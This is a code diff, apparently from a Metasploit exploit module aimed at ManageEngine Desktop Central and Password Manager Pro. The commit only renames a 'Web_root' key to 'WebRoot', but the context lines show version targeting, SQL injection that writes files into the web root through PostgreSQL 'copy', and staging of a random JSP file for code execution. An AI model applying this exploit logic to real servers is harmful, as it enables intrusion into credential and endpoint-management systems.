@@ -55,49 +55,49 @@ def initialize(info={})
5555 [ 'Automatic' , { } ] ,
5656 [ 'Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows' ,
5757 {
58- 'Web_root ' => 'C:\\ManageEngine\\DesktopCentral_Server\\webapps\\DesktopCentral\\' ,
58+ 'WebRoot ' => 'C:\\ManageEngine\\DesktopCentral_Server\\webapps\\DesktopCentral\\' ,
5959 'Database' => 'postgresql' ,
6060 'Platform' => 'win'
6161 }
6262 ] ,
6363 [ 'Desktop Central MSP v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows' ,
6464 {
65- 'Web_root ' => 'C:\\ManageEngine\\DesktopCentralMSP_Server\\webapps\\DesktopCentral\\' ,
65+ 'WebRoot ' => 'C:\\ManageEngine\\DesktopCentralMSP_Server\\webapps\\DesktopCentral\\' ,
6666 'Database' => 'postgresql' ,
6767 'Platform' => 'win'
6868 }
6969 ] ,
7070 [ 'Desktop Central [MSP] v7 >= b70200 / v8 / v9 < b90039 (MySQL) on Windows' ,
7171 {
72- 'Web_root ' => '../../webapps/DesktopCentral/' ,
72+ 'WebRoot ' => '../../webapps/DesktopCentral/' ,
7373 'Database' => 'mysql' ,
7474 'Platform' => 'win'
7575 }
7676 ] ,
7777 [ 'Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Windows' ,
7878 {
79- 'Web_root ' => 'C:\\ManageEngine\\PMP\\webapps\\PassTrix\\' ,
79+ 'WebRoot ' => 'C:\\ManageEngine\\PMP\\webapps\\PassTrix\\' ,
8080 'Database' => 'postgresql' ,
8181 'Platform' => 'win'
8282 }
8383 ] ,
8484 [ 'Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Windows' ,
8585 {
86- 'Web_root ' => '../../webapps/PassTrix/' ,
86+ 'WebRoot ' => '../../webapps/PassTrix/' ,
8787 'Database' => 'mysql' ,
8888 'Platform' => 'win'
8989 }
9090 ] ,
9191 [ 'Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Linux' ,
9292 {
93- 'Web_root ' => '/opt/ManageEngine/PMP/webapps/PassTrix/' ,
93+ 'WebRoot ' => '/opt/ManageEngine/PMP/webapps/PassTrix/' ,
9494 'Database' => 'postgresql' ,
9595 'Platform' => 'linux'
9696 }
9797 ] ,
9898 [ 'Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Linux' ,
9999 {
100- 'Web_root ' => '../../webapps/PassTrix/' ,
100+ 'WebRoot ' => '../../webapps/PassTrix/' ,
101101 'Database' => 'mysql' ,
102102 'Platform' => 'linux'
103103 }
@@ -215,11 +215,11 @@ def pick_target
215215 postgresql_path = datastore [ 'WEB_ROOT' ] . dup
216216 mysql_path = datastore [ 'WEB_ROOT' ] . dup
217217 elsif res . body . to_s =~ /ManageEngine Desktop Central MSP/
218- postgresql_path = targets [ 2 ] [ 'Web_root ' ] . dup
219- mysql_path = targets [ 3 ] [ 'Web_root ' ] . dup
218+ postgresql_path = targets [ 2 ] [ 'WebRoot ' ] . dup
219+ mysql_path = targets [ 3 ] [ 'WebRoot ' ] . dup
220220 else
221- postgresql_path = targets [ 1 ] [ 'Web_root ' ] . dup
222- mysql_path = targets [ 3 ] [ 'Web_root ' ] . dup
221+ postgresql_path = targets [ 1 ] [ 'WebRoot ' ] . dup
222+ mysql_path = targets [ 3 ] [ 'WebRoot ' ] . dup
223223 end
224224 else
225225 # Test for Password Manager Pro
@@ -233,8 +233,8 @@ def pick_target
233233 postgresql_path = datastore [ 'WEB_ROOT' ] . dup
234234 mysql_path = datastore [ 'WEB_ROOT' ] . dup
235235 else
236- postgresql_path = targets [ 4 ] [ 'Web_root ' ] . dup
237- mysql_path = targets [ 5 ] [ 'Web_root ' ] . dup
236+ postgresql_path = targets [ 4 ] [ 'WebRoot ' ] . dup
237+ mysql_path = targets [ 5 ] [ 'WebRoot ' ] . dup
238238 end
239239 else
240240 # We don't know what this is, bail
@@ -301,7 +301,7 @@ def pick_target
301301 else
302302 # OK, it's Password Manager Pro on Linux, probably using PostgreSQL and
303303 # no WEB_ROOT was provided. Let's try one of the defaults before bailing out.
304- filepath = targets [ 5 ] [ 'Web_root ' ] . dup << rand_txt
304+ filepath = targets [ 5 ] [ 'WebRoot ' ] . dup << rand_txt
305305 inject_sql ( "copy (select version()) to '#{ filepath } , "postgresql" )
306306
307307 res = send_request_cgi ( {
@@ -545,7 +545,7 @@ def exploit
545545 if datastore [ 'WEB_ROOT' ]
546546 web_root = datastore [ 'WEB_ROOT' ]
547547 else
548- web_root = @my_target [ 'Web_root ' ]
548+ web_root = @my_target [ 'WebRoot ' ]
549549 end
550550
551551 jsp_name = rand_text_alpha_lower ( 8 ) + ".jsp"
0 commit comments